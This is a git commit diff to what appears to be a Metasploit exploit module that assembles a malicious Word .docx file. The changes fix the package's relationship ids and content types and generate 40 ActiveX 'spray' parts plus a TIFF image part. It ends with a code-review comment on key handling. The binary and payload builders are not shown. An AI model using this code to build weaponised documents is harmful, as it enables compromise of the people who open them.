More progress

bug/bundler_fix
sinn3r 2013-11-21 04:27:41 -06:00
parent e13e457d8f
commit ddd5b0abb9
1 changed files with 142 additions and 55 deletions


@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
'ax:persistence' => "persistStorage",
'r:id' => rid,
'r:id' => "rId#{rid.to_s}",
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => @schema
}
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
xml.Relationship({:Id=>rid, :Type=>acx_type, :Target=>target_bin})
xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
end
end
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Exploit::Remote
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
relationships.each do |r|
xml.Relationship({:Id=>r[:id], :Type=>r[:type], :Target=>r[:target]})
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
end
end
end
@ -276,11 +276,20 @@ class Metasploit3 < Msf::Exploit::Remote
rels = []
rels << doc_xml
rels << doc_props
rels = rels.flatten
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
rels.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
end
end
end
{
:fname => "_rels/.rels",
# The .rels generates the same format like make_doc_xml_reals, we'll just use that
:data => make_doc_xml_reals(rels.flatten)
:data => builder.to_xml
}
end
@ -295,14 +304,14 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:rid] }
pre_defs.select { |e| chart_rids << e[:id] }
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:rid] }
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:rid]
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
@ -340,7 +349,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
# The "spray" is contained in these "run" elements
xml.r do
end
@ -359,7 +368,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
#xml.extend({'cx'=>'1', 'cy'=>'1'})
xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
xml.docPr({'id'=>'1', 'name' => "drawing 1"})
xml.docPr({'id'=>'rId1', 'name' => "drawing 1"})
xml.cNvGraphicFramePr
xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
@ -373,16 +382,17 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Paragraph (TIFF)
end
end
end
{
:rid => "rId#{last_rid.to_s}",
:type => "#{@schema}/officeDocument",
:fname => "word/document.xml",
:xml => builder.to_xml
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml
}
end
@ -418,15 +428,15 @@ class Metasploit3 < Msf::Exploit::Remote
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.root({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
# Default extensions
contenttypes.each do |contenttype|
xml.Override(contenttype)
xml.Default(contenttype)
end
# Additional overrides
overrides.each do |override|
xml.Override({:PartName => override[:PartName], :ContentType => override[:ContentType]})
xml.Override({:PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType]})
end
end
end
@ -440,9 +450,19 @@ class Metasploit3 < Msf::Exploit::Remote
#
def init_doc_props(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/extended-properties",
:fname => "/docProps/app.xml",
:content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/core-properties",
:fname => "/docProps/core.xml",
:content_type => "application/vnd.openxmlformats-package.core-properties+xml"
}
return last_rid, items
end
@ -453,16 +473,82 @@ class Metasploit3 < Msf::Exploit::Remote
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/styles", :fname => "word/styles.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/settings", :fname => "word/settings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/theme", :fname => "word/theme/theme1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart2.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart3.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart4.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart5.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart6.xml"}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/styles",
:fname => "/word/styles.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/settings",
:fname => "/word/settings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/webSettings",
:fname => "/word/webSettings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/fontTable",
:fname => "/word/fontTable.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/theme",
:fname => "/word/theme/theme1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart2.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart3.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart4.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart5.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart6.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
return last_rid, items
end
@ -475,30 +561,28 @@ class Metasploit3 < Msf::Exploit::Remote
activex = []
40.times do |i|
id = last_rid + i
last_rid = id
rid = "rId#{id.to_s}"
id = (last_rid += 1)
bin = {
:fname => "word/activeX/ActiveX#{id.to_s}.bin",
:fname => "/word/activeX/ActiveX#{id.to_s}.bin",
:bin => make_activex_bin
}
xml = {
:fname => "word/activeX/ActiveX#{id.to_s}.xml",
:xml => make_activex_xml(rid)
:fname => "/word/activeX/activeX#{id.to_s}.xml",
:xml => make_activex_xml(id)
}
rels = {
:fname => "word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(rid, "activeX#{id.to_s}.bin")
:fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}/control"
activex << {
:rid => rid,
:id => id,
:bin => bin,
:xml => xml,
:rels => rels,
@ -516,10 +600,12 @@ class Metasploit3 < Msf::Exploit::Remote
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(activex)
def init_contenttype_xml_file(*items)
overrides = []
activex.each do |obj|
overrides << {:PartName => obj[:xml][:fname], :ContentType => obj[:content_type]}
items.each do |item|
item.each do |obj|
overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
end
end
{:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
@ -530,14 +616,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Creates the tiff file
#
def init_tiff_file(last_rid)
id = last_rid + 1
tiff_data = {
:rid => "rId#{(last_rid += 1).to_s}",
:fname => "word/media/image1.jpeg",
:id => id,
:fname => "/word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}/image"
}
return last_rid, tiff_data
return id, tiff_data
end
#
@ -546,16 +633,16 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
end
reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
{:fname => "word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
{:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
end
#
@ -576,14 +663,14 @@ class Metasploit3 < Msf::Exploit::Remote
#
def make_docx(path)
print_status("Initializing files...")
last_rid = 1
last_rid, activex = init_activex_files(last_rid)
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
last_rid, tiff_file = init_tiff_file(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
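Review bot: In init_contenttype_xml_file (the `-516,10 +600,12` hunk) the new lookup `obj[:fname] || obj[:xml][:fname]` assumes `:xml` is a nested hash, but this commit also uses `:xml` for a string: init_doc_xml returns `:xml => builder.to_xml` next to `:fname`. It works for the lists passed from make_docx because those string-valued entries carry `:fname`, but an entry with neither key fails with NoMethodError on nil, and the comment above the method still describes only ActiveX parts. I would reword that comment to say the method takes any number of item lists whose entries need `:content_type` plus either `:fname` or `:xml => {:fname => ...}`, and make the fallback explicit with `part = obj[:fname] || obj.fetch(:xml).fetch(:fname)`. Related, init_doc_xml now returns `:id => (last_rid + 1).to_s` while the other init_* helpers return integer ids; the visible consumers interpolate with `.to_s`, so this is harmless today but worth unifying. The method's closing `end` lies outside the hunk.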